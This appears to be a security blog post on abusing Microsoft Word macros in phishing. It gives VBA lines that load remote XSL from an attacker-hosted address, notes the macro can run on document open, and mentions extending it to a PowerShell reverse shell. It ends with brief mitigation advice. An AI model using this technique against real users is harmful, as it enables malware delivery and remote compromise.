MS Word Macro + Phishing

MS Word Macro + Phishing

MS Word Macro + Phishing


How Microsoft Word can be potentially dangerous on phishing scenario.


To exploit Microsoft Word Macro functionality to return a shell to a remote machine (attacker).

Lets look at Microsoft Word and effectively the Macro functionality can be taken to our advantage in phishing scenario.  This attack is focused on exploiting Windows’ devices as this is still the most common operating system in the corporate environment.

Purpose of MS Word Macros

In Word, you can automate frequently used tasks by creating and running macros. A macro is a series of commands and instructions that you group together as a single command to accomplish a task automatically. It is a simple Visual Basic scripting where user can add event based script which actions on word document.

As this exploit is more about how macro can be leveraged, we will not go into to much detail about phishing emails or other delivery methods, as I will save this for another day.

Method – Images, Screen shots, etc

Creating the macro in Word document is straight forward by opening a New word document, View->Macros-><Enter Macro name>->Create

Set XML = CreateObject(“Microsoft.XMLDOM”) – Creates an XML object

XML.async = False – Waits for the result to be returned when XML object does a request.

Set xsl = XML – Setting to accept XML

xsl.Load (“http://x.x.x.x/test.xml”) – Loads XML into memory, IP address is attacker hosted site

XML.transformnode xsl – Applies the XSL style sheet to the XMLdocument







As seen in the Figure:3, The actual payload itself creates a WScript shell and runs Calc.exe application when macro is executed. But the word does displays a Security warning message as in Figure:4. This macro script can be added to Word Document’s Open event, which will execute the macro immediately when user opens the document. Figure:5 shows when the payload has been executed. Further one can amend the Payload with Powershell or other effective techniques for a revershell.

To mitigate this issue, It is necessary to educate in corporate environment while opening a document which contains macro security warning message. Macros enabled word document with scripts are not recognised as potential threat since looking at figure:6, Virustotal scans the document and highlights that 3 of the engines has identified this document as a potential Trojan embedded.

Credits: Thanks to Sensepost for information on Macro-less Code Exec in MSWord.